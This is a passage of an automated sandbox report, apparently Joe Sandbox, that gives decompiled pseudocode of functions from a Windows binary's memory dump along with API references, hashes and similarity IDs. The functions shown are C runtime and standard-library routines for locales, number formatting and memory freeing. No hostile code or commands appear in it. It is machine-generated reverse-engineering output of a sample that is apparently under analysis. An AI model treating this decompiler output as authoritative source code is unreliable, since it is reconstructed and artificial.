                                                                                                                                                                                                        								__eflags = _t33 - 0x429920;
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									_push(_t33);
                                                                                                                                                                                                        									E00406C4C(_t25, _t31, _t33, __eflags);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t21 =  *0x429d48; // 0x2031638
                                                                                                                                                                                                        						 *(_t31 + 0x68) = _t21;
                                                                                                                                                                                                        						_t33 =  *0x429d48; // 0x2031638
                                                                                                                                                                                                        						 *(_t34 - 0x1c) = _t33;
                                                                                                                                                                                                        						InterlockedIncrement(_t33);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *(_t34 - 4) = 0xfffffffe;
                                                                                                                                                                                                        					E004107DD();
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t33 =  *(_t31 + 0x68);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t33 == 0) {
                                                                                                                                                                                                        					E0040C50B(_t29, _t31, 0x20);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E0040D2D9(_t33);
                                                                                                                                                                                                        			}











                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __getptd.LIBCMT ref: 0041074E
                                                                                                                                                                                                          • Part of subcall function 0040B6F6: __getptd_noexit.LIBCMT ref: 0040B6F9
                                                                                                                                                                                                          • Part of subcall function 0040B6F6: __amsg_exit.LIBCMT ref: 0040B706
                                                                                                                                                                                                        • __amsg_exit.LIBCMT ref: 0041076E
                                                                                                                                                                                                        • __lock.LIBCMT ref: 0041077E
                                                                                                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 0041079B
                                                                                                                                                                                                        • InterlockedIncrement.KERNEL32(02031638), ref: 004107C6
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 4271482742-0
                                                                                                                                                                                                        • Opcode ID: a42977f6e7ceec3f689bd588e4d4e93f8f1e1001c8aa15e33a934d697cb5037e
                                                                                                                                                                                                        • Instruction ID: bad8106a138496c333cffe7441060a311f2fa3a9b62a61513f8d4826e3485096
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a42977f6e7ceec3f689bd588e4d4e93f8f1e1001c8aa15e33a934d697cb5037e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30016D32E01621ABD721AB6998457DEB360AF04764F54012BE820B76D1CB7CADC2DFDD
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0041F4B0(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char* _a28, char _a32) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				char _v48;
                                                                                                                                                                                                        				char* _v52;
                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                        				char _v60;
                                                                                                                                                                                                        				char _v68;
                                                                                                                                                                                                        				char _v76;
                                                                                                                                                                                                        				char _v84;
                                                                                                                                                                                                        				char _v92;
                                                                                                                                                                                                        				char _v96;
                                                                                                                                                                                                        				intOrPtr _v100;
                                                                                                                                                                                                        				char _v104;
                                                                                                                                                                                                        				intOrPtr _t123;
                                                                                                                                                                                                        				intOrPtr _t128;
                                                                                                                                                                                                        				signed char _t131;
                                                                                                                                                                                                        				intOrPtr* _t134;
                                                                                                                                                                                                        				intOrPtr* _t144;
                                                                                                                                                                                                        				intOrPtr* _t149;
                                                                                                                                                                                                        				intOrPtr* _t153;
                                                                                                                                                                                                        				void* _t154;
                                                                                                                                                                                                        				void* _t155;
                                                                                                                                                                                                        				char _t195;
                                                                                                                                                                                                        				void* _t251;
                                                                                                                                                                                                        				void* _t252;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t174 = __ebx;
                                                                                                                                                                                                        				_t123 = E0041FAB0(__ebx, __edi, __eflags, E0041D440(_a20,  &_v60));
                                                                                                                                                                                                        				_t252 = _t251 + 4;
                                                                                                                                                                                                        				_v12 = _t123;
                                                                                                                                                                                                        				E0041D370( &_v60);
                                                                                                                                                                                                        				E0041FA80(_v12,  &_v48);
                                                                                                                                                                                                        				if( *_a28 == 0x2b ||  *_a28 == 0x2d) {
                                                                                                                                                                                                        					_v100 = 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					if( *_a28 != 0x30 ||  *((char*)(_a28 + 1)) != 0x78 &&  *((char*)(_a28 + 1)) != 0x58) {
                                                                                                                                                                                                        						_v96 = 0;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_v96 = 2;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_v100 = _v96;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_v16 = _v100;
                                                                                                                                                                                                        				if( *((char*)(E00401380( &_v48))) == 0x7f ||  *((char*)(E00401380( &_v48))) <= 0) {
                                                                                                                                                                                                        					L18:
                                                                                                                                                                                                        					_t128 = E0041DF60(_a20);
                                                                                                                                                                                                        					__eflags = _t128;
                                                                                                                                                                                                        					if(_t128 <= 0) {
                                                                                                                                                                                                        						L21:
                                                                                                                                                                                                        						_v104 = 0;
                                                                                                                                                                                                        						L22:
                                                                                                                                                                                                        						_v20 = _v104;
                                                                                                                                                                                                        						_v8 = E0041D420(_a20) & 0x000001c0;
                                                                                                                                                                                                        						__eflags = _v8 - 0x40;
                                                                                                                                                                                                        						if(_v8 == 0x40) {
                                                                                                                                                                                                        							L25:
                                                                                                                                                                                                        							__eflags = _v8 - 0x100;
                                                                                                                                                                                                        							if(_v8 == 0x100) {
                                                                                                                                                                                                        								_t144 = E0041F880(_a4,  &_v76, _a12, _a16, _a28, _v16);
                                                                                                                                                                                                        								_a12 =  *_t144;
                                                                                                                                                                                                        								_a16 =  *((intOrPtr*)(_t144 + 4));
                                                                                                                                                                                                        								_a28 = _a28 + _v16;
                                                                                                                                                                                                        								_t89 =  &_a32; // 0x41e634
                                                                                                                                                                                                        								_t195 =  *_t89 - _v16;
                                                                                                                                                                                                        								__eflags = _t195;
                                                                                                                                                                                                        								_a32 = _t195;
                                                                                                                                                                                                        								_t149 = E0041F7D0(_a4,  &_v84, _a12, _a16, _a24 & 0x000000ff, _v20);
                                                                                                                                                                                                        								_t252 = _t252 + 0x30;
                                                                                                                                                                                                        								_a12 =  *_t149;
                                                                                                                                                                                                        								_a16 =  *((intOrPtr*)(_t149 + 4));
                                                                                                                                                                                                        								_v20 = 0;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							L27:
                                                                                                                                                                                                        							_t131 = E0041FA60(_v12);
                                                                                                                                                                                                        							_t103 =  &_a32; // 0x41e634
                                                                                                                                                                                                        							_t134 = E0041F8F0(_a4,  &_v92, _a12, _a16, _a28,  *_t103, _t131 & 0x000000ff);
                                                                                                                                                                                                        							_a12 =  *_t134;
                                                                                                                                                                                                        							_a16 =  *((intOrPtr*)(_t134 + 4));
                                                                                                                                                                                                        							E0041DF80(_a20, 0);
                                                                                                                                                                                                        							E0041F7D0(_a4, _a8, _a12, _a16, _a24 & 0x000000ff, _v20);
                                                                                                                                                                                                        							E00401070( &_v48);
                                                                                                                                                                                                        							return _a8;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _v8 - 0x100;
                                                                                                                                                                                                        						if(_v8 == 0x100) {
                                                                                                                                                                                                        							goto L25;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t153 = E0041F7D0(_a4,  &_v68, _a12, _a16, _a24 & 0x000000ff, _v20);
                                                                                                                                                                                                        						_t252 = _t252 + 0x18;
                                                                                                                                                                                                        						_a12 =  *_t153;
                                                                                                                                                                                                        						_a16 =  *((intOrPtr*)(_t153 + 4));
                                                                                                                                                                                                        						_v20 = 0;
                                                                                                                                                                                                        						goto L27;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t154 = E0041DF60(_a20);
                                                                                                                                                                                                        					_t55 =  &_a32; // 0x41e634
                                                                                                                                                                                                        					__eflags = _t154 -  *_t55;
                                                                                                                                                                                                        					if(_t154 <=  *_t55) {
                                                                                                                                                                                                        						goto L21;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t155 = E0041DF60(_a20);
                                                                                                                                                                                                        					_t57 =  &_a32; // 0x41e634
                                                                                                                                                                                                        					_v104 = _t155 -  *_t57;
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_v52 = E00401380( &_v48);
                                                                                                                                                                                                        					_t25 =  &_a32; // 0x41e634
                                                                                                                                                                                                        					_v56 =  *_t25;
                                                                                                                                                                                                        					while( *_v52 != 0x7f &&  *_v52 > 0 &&  *_v52 < _v56 - _v16) {
                                                                                                                                                                                                        						_v56 = _v56 -  *_v52;
                                                                                                                                                                                                        						_t35 =  &_a32; // 0x41e634
                                                                                                                                                                                                        						_t39 =  &_a32; // 0x41e634
                                                                                                                                                                                                        						E00406973(_t174, _a28 + _v56 + 1,  *_t39 + 1 - _v56, _a28 + _v56,  *_t35 + 1 - _v56);
                                                                                                                                                                                                        						_t252 = _t252 + 0x10;
                                                                                                                                                                                                        						 *((char*)(_a28 + _v56)) = 0;
                                                                                                                                                                                                        						_t47 =  &_a32; // 0x41e634
                                                                                                                                                                                                        						_a32 =  *_t47 + 1;
                                                                                                                                                                                                        						if( *((char*)(_v52 + 1)) > 0) {
                                                                                                                                                                                                        							_v52 = _v52 + 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L18;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}


                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 0041D440: std::locale::locale.LIBCPMTD ref: 0041D451
                                                                                                                                                                                                          • Part of subcall function 0041FAB0: std::_Lockit::_Lockit.LIBCPMT ref: 0041FABB
                                                                                                                                                                                                          • Part of subcall function 0041FAB0: int.LIBCPMTD ref: 0041FACD
                                                                                                                                                                                                          • Part of subcall function 0041FAB0: std::locale::_Getfacet.LIBCPMTD ref: 0041FADC
                                                                                                                                                                                                          • Part of subcall function 0041D370: std::locale::facet::_Decref.LIBCPMTD ref: 0041D386
                                                                                                                                                                                                        • _memmove_s.LIBCMT ref: 0041F5D5
                                                                                                                                                                                                        • std::ios_base::width.LIBCPMTD ref: 0041F747
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DecrefGetfacetLockitLockit::__memmove_sstd::_std::ios_base::widthstd::locale::_std::locale::facet::_std::locale::locale
                                                                                                                                                                                                        • String ID: 4A$@
                                                                                                                                                                                                        • API String ID: 3492058185-2914105643
                                                                                                                                                                                                        • Opcode ID: 6f4bfb96f4ee5afbe46bc0b3f07b2a126c4fe86f766943909cd89c288331bbe1
                                                                                                                                                                                                        • Instruction ID: b6c4a3b8c94fdb9aa047002bef48bd8eb04d08bf537c12304cab257c8651ecb0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f4bfb96f4ee5afbe46bc0b3f07b2a126c4fe86f766943909cd89c288331bbe1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 04A12BB1900148AFCB04DF98D9909EE7BB6BF49304F14825EF819A7355D738EE46CB94
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 73%
E0041E7B0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed char _a20, signed int _a24) {
	signed char _v8;
	signed int _v12;
	intOrPtr _v16;
	int _v20;
	long _v132;
	char _v140;
	intOrPtr _v144;
	signed int _v145;
	intOrPtr _v152;
	intOrPtr _v156;
	intOrPtr _v160;
	signed char _v164;
	signed char _t81;
	void* _t95;
	signed int _t109;
	void* _t120;
	void* _t121;
	void* _t122;

	_t121 = __esi;
	_t120 = __edi;
	_t95 = __ebx;
	_v152 = __ecx;
	_v20 = 0x6c;
	if(E0041E9D0(_a16) > 0 || (E0041D420(_a16) & 0x00002000) != 0) {
		_v156 = E0041E9D0(_a16);
	} else {
		_v156 = 6;
	}
	_v16 = _v156;
	if(_v16 <= 0x24) {
		_v160 = _v16;
	} else {
		_v160 = 0x24;
	}
	_v144 = _v160;
	_v16 = _v16 - _v144;
	_v8 = 0;
	_v12 = 0;
	_t81 = E0041D420(_a16) & 0x00003000;
	if(_t81 == 0x2000) {
		asm("fcomp qword [ebp+0x1c]");
		asm("fnstsw ax");
		if((_t81 & 0x00000044) == 0) {
			asm("fldz");
			asm("fcomp qword [ebp+0x1c]");
			asm("fnstsw ax");
			if((_t81 & 0x00000041) != 0) {
				_v164 = 0;
			} else {
				_v164 = 1;
			}
			_v145 = _v164;
			if((_v145 & 0x000000ff) != 0) {
				asm("fchs");
			}
			while(1) {
				asm("fcomp qword [0x421980]");
				asm("fnstsw ax");
				if((_t81 & 0x00000001) != 0 || _v8 >= 0x1388) {
					break;
				}
				_a24 = _a24 /  *0x421978;
				_t81 = _v8 + 0xa;
				_v8 = _t81;
			}
			asm("fcomp qword [0x421988]");
			asm("fnstsw ax");
			__eflags = _t81 & 0x00000041;
			if((_t81 & 0x00000041) == 0) {
				while(1) {
					__eflags = _v16 - 0xa;
					if(_v16 < 0xa) {
						goto L26;
					}
					asm("fcomp qword [ebp+0x1c]");
					asm("fnstsw ax");
					__eflags = _t81 & 0x00000001;
					if((_t81 & 0x00000001) == 0) {
						__eflags = _v12 - 0x1388;
						if(_v12 < 0x1388) {
							_a24 = _a24 *  *0x421978;
							_v16 = _v16 - 0xa;
							_t109 = _v12 + 0xa;
							__eflags = _t109;
							_v12 = _t109;
							continue;
						}
					}
					goto L26;
				}
			}
			L26:
			__eflags = _v145 & 0x000000ff;
			if((_v145 & 0x000000ff) != 0) {
				asm("fchs");
			}
		}
	}
	 *(_t122 - 8) = _a24;
	_push(_v144);
	E0041ED90(_t95, _t120, _t121, __eflags, _v152, _a4, _a8, _a12, _a16, _a20 & 0x000000ff,  &_v132, _v8, _v12, _v16, swprintf( &_v132, 0x6c, E0041ECB0(_v152,  &_v140, 0, E0041D420(_a16))));
	return _a4;
}
                                                                                                                                                                                                        0x0041e918
                                                                                                                                                                                                        0x0041e91f
                                                                                                                                                                                                        0x0041e92a
                                                                                                                                                                                                        0x0041e933
                                                                                                                                                                                                        0x0041e8fc
                                                                                                                                                                                                        0x0041e8fc
                                                                                                                                                                                                        0x0041e8ff
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041e8ff
                                                                                                                                                                                                        0x0041e91f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041e916
                                                                                                                                                                                                        0x0041e902
                                                                                                                                                                                                        0x0041e938
                                                                                                                                                                                                        0x0041e93f
                                                                                                                                                                                                        0x0041e941
                                                                                                                                                                                                        0x0041e946
                                                                                                                                                                                                        0x0041e948
                                                                                                                                                                                                        0x0041e941
                                                                                                                                                                                                        0x0041e86e
                                                                                                                                                                                                        0x0041e951
                                                                                                                                                                                                        0x0041e95a
                                                                                                                                                                                                        0x0041e9b8
                                                                                                                                                                                                        0x0041e9c6

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: swprintf
                                                                                                                                                                                                        • String ID: $$$$l
                                                                                                                                                                                                        • API String ID: 233258989-1469801561
                                                                                                                                                                                                        • Opcode ID: 97d17a94d436c842e3f8c2928b688944c1465ae4255c1259152315e3aba56471
                                                                                                                                                                                                        • Instruction ID: 3c94a0c346cc92c29fdf28e7622c72ac2147586bbe3f6fa93345d3e70a4f15ad
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 97d17a94d436c842e3f8c2928b688944c1465ae4255c1259152315e3aba56471
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 36516DB490021DDBDF14DF56D954BEEBB74BF44300F00819AE999A3281DB389AE6CF19
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                                                                                        			E0041E9F0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed char _a20, signed int _a24) {
                                                                                                                                                                                                        				signed char _v8;
                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                        				int _v20;
                                                                                                                                                                                                        				long _v132;
                                                                                                                                                                                                        				char _v140;
                                                                                                                                                                                                        				intOrPtr _v144;
                                                                                                                                                                                                        				signed int _v145;
                                                                                                                                                                                                        				intOrPtr _v152;
                                                                                                                                                                                                        				intOrPtr _v156;
                                                                                                                                                                                                        				intOrPtr _v160;
                                                                                                                                                                                                        				signed char _v164;
                                                                                                                                                                                                        				signed char _t78;
                                                                                                                                                                                                        				void* _t92;
                                                                                                                                                                                                        				signed int _t106;
                                                                                                                                                                                                        				void* _t117;
                                                                                                                                                                                                        				void* _t118;
                                                                                                                                                                                                        				void* _t119;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t118 = __esi;
                                                                                                                                                                                                        				_t117 = __edi;
                                                                                                                                                                                                        				_t92 = __ebx;
                                                                                                                                                                                                        				_v152 = __ecx;
                                                                                                                                                                                                        				_v20 = 0x6c;
                                                                                                                                                                                                        				if(E0041E9D0(_a16) > 0 || (E0041D420(_a16) & 0x00002000) != 0) {
                                                                                                                                                                                                        					_v156 = E0041E9D0(_a16);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_v156 = 6;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_v16 = _v156;
                                                                                                                                                                                                        				if(_v16 <= 0x24) {
                                                                                                                                                                                                        					_v160 = _v16;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_v160 = 0x24;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_v144 = _v160;
                                                                                                                                                                                                        				_v16 = _v16 - _v144;
                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                                                        				_t78 = E0041D420(_a16) & 0x00003000;
                                                                                                                                                                                                        				if(_t78 == 0x2000) {
                                                                                                                                                                                                        					asm("fldz");
                                                                                                                                                                                                        					asm("fcomp qword [ebp+0x1c]");
                                                                                                                                                                                                        					asm("fnstsw ax");
                                                                                                                                                                                                        					if((_t78 & 0x00000041) != 0) {
                                                                                                                                                                                                        						_v164 = 0;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_v164 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_v145 = _v164;
                                                                                                                                                                                                        					if((_v145 & 0x000000ff) != 0) {
                                                                                                                                                                                                        						asm("fchs");
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						asm("fcomp qword [0x421980]");
                                                                                                                                                                                                        						asm("fnstsw ax");
                                                                                                                                                                                                        						if((_t78 & 0x00000001) != 0 || _v8 >= 0x1388) {
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_a24 = _a24 /  *0x421978;
                                                                                                                                                                                                        						_t78 = _v8 + 0xa;
                                                                                                                                                                                                        						_v8 = _t78;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					asm("fcomp qword [0x421988]");
                                                                                                                                                                                                        					asm("fnstsw ax");
                                                                                                                                                                                                        					__eflags = _t78 & 0x00000041;
                                                                                                                                                                                                        					if((_t78 & 0x00000041) == 0) {
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							__eflags = _v16 - 0xa;
                                                                                                                                                                                                        							if(_v16 < 0xa) {
                                                                                                                                                                                                        								goto L25;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							asm("fcomp qword [ebp+0x1c]");
                                                                                                                                                                                                        							asm("fnstsw ax");
                                                                                                                                                                                                        							__eflags = _t78 & 0x00000001;
                                                                                                                                                                                                        							if((_t78 & 0x00000001) == 0) {
                                                                                                                                                                                                        								__eflags = _v12 - 0x1388;
                                                                                                                                                                                                        								if(_v12 < 0x1388) {
                                                                                                                                                                                                        									_a24 = _a24 *  *0x421978;
                                                                                                                                                                                                        									_v16 = _v16 - 0xa;
                                                                                                                                                                                                        									_t106 = _v12 + 0xa;
                                                                                                                                                                                                        									__eflags = _t106;
                                                                                                                                                                                                        									_v12 = _t106;
                                                                                                                                                                                                        									continue;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							goto L25;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L25:
                                                                                                                                                                                                        					__eflags = _v145 & 0x000000ff;
                                                                                                                                                                                                        					if((_v145 & 0x000000ff) != 0) {
                                                                                                                                                                                                        						asm("fchs");
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *(_t119 - 8) = _a24;
                                                                                                                                                                                                        				_push(_v144);
                                                                                                                                                                                                        				E0041ED90(_t92, _t117, _t118, __eflags, _v152, _a4, _a8, _a12, _a16, _a20 & 0x000000ff,  &_v132, _v8, _v12, _v16, swprintf( &_v132, 0x6c, E0041ECB0(_v152,  &_v140, 0x4c, E0041D420(_a16))));
                                                                                                                                                                                                        				return _a4;
                                                                                                                                                                                                        			}






















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: swprintf
                                                                                                                                                                                                        • String ID: $$$$l
                                                                                                                                                                                                        • API String ID: 233258989-1469801561
                                                                                                                                                                                                        • Opcode ID: 6c3cea097df9fc190284f711e3ab54a8029797d0ea474b246fe7d57bb776c220
                                                                                                                                                                                                        • Instruction ID: 1cc828687bb7214b2eca30bed96952f9c294d2619a15095886b1142353ba247c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6c3cea097df9fc190284f711e3ab54a8029797d0ea474b246fe7d57bb776c220
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32518DB4D0011DDBDF14CF56E955BEE7BB5BF44300F00819AE999A2281CB389AE1CF19
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00408971(char _a4) {
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				intOrPtr _t24;
                                                                                                                                                                                                        				intOrPtr* _t25;
                                                                                                                                                                                                        				intOrPtr _t26;
                                                                                                                                                                                                        				intOrPtr* _t27;
                                                                                                                                                                                                        				intOrPtr* _t28;
                                                                                                                                                                                                        				intOrPtr* _t44;
                                                                                                                                                                                                        				intOrPtr* _t45;
                                                                                                                                                                                                        				intOrPtr* _t46;
                                                                                                                                                                                                        				void* _t65;
                                                                                                                                                                                                        				intOrPtr* _t66;
                                                                                                                                                                                                        				intOrPtr* _t67;
                                                                                                                                                                                                        				char _t69;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t69 = _a4;
                                                                                                                                                                                                        				_t2 = _t69 + 0xbc; // 0x75ff3e83
                                                                                                                                                                                                        				_t24 =  *_t2;
                                                                                                                                                                                                        				if(_t24 == 0 || _t24 == 0x429064) {
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					_t10 = _t69 + 0xc0; // 0x6cbbe813
                                                                                                                                                                                                        					_t25 =  *_t10;
                                                                                                                                                                                                        					if(_t25 != 0) {
                                                                                                                                                                                                        						_t81 =  *_t25;
                                                                                                                                                                                                        						if( *_t25 == 0) {
                                                                                                                                                                                                        							_t11 = _t69 + 0xc4; // 0x3883ffff
                                                                                                                                                                                                        							_push( *_t11 - 0xfe);
                                                                                                                                                                                                        							E00406C4C(0, _t65, _t69, _t81);
                                                                                                                                                                                                        							_t12 = _t69 + 0xcc; // 0xe83fb0cf
                                                                                                                                                                                                        							_push( *_t12 - 0x80);
                                                                                                                                                                                                        							E00406C4C(0, 0x80, _t69, _t81);
                                                                                                                                                                                                        							_t13 = _t69 + 0xd0; // 0xffffff64
                                                                                                                                                                                                        							_t41 =  *_t13 - 0x80;
                                                                                                                                                                                                        							_push( *_t13 - 0x80);
                                                                                                                                                                                                        							E00406C4C(0, 0x80, _t69, _t41);
                                                                                                                                                                                                        							_t14 = _t69 + 0xc0; // 0x6cbbe813
                                                                                                                                                                                                        							_push( *_t14);
                                                                                                                                                                                                        							E00406C4C(0, 0x80, _t69, _t41);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t15 = _t69 + 0xd4; // 0x412d77
                                                                                                                                                                                                        					_t66 = _t15;
                                                                                                                                                                                                        					_t26 =  *_t66;
                                                                                                                                                                                                        					if(_t26 != 0x429858) {
                                                                                                                                                                                                        						_t84 =  *((intOrPtr*)(_t26 + 0xb4));
                                                                                                                                                                                                        						if( *((intOrPtr*)(_t26 + 0xb4)) == 0) {
                                                                                                                                                                                                        							E0040FDAB(_t26);
                                                                                                                                                                                                        							_push( *_t66);
                                                                                                                                                                                                        							E00406C4C(0, _t66, _t69, _t84);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t17 = _t69 + 0x50; // 0x412cf3
                                                                                                                                                                                                        					_t67 = _t17;
                                                                                                                                                                                                        					_a4 = 6;
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						if( *((intOrPtr*)(_t67 - 8)) != 0x429530) {
                                                                                                                                                                                                        							_t27 =  *_t67;
                                                                                                                                                                                                        							if(_t27 != 0) {
                                                                                                                                                                                                        								_t87 =  *_t27;
                                                                                                                                                                                                        								if( *_t27 == 0) {
                                                                                                                                                                                                        									_push(_t27);
                                                                                                                                                                                                        									E00406C4C(0, _t67, _t69, _t87);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
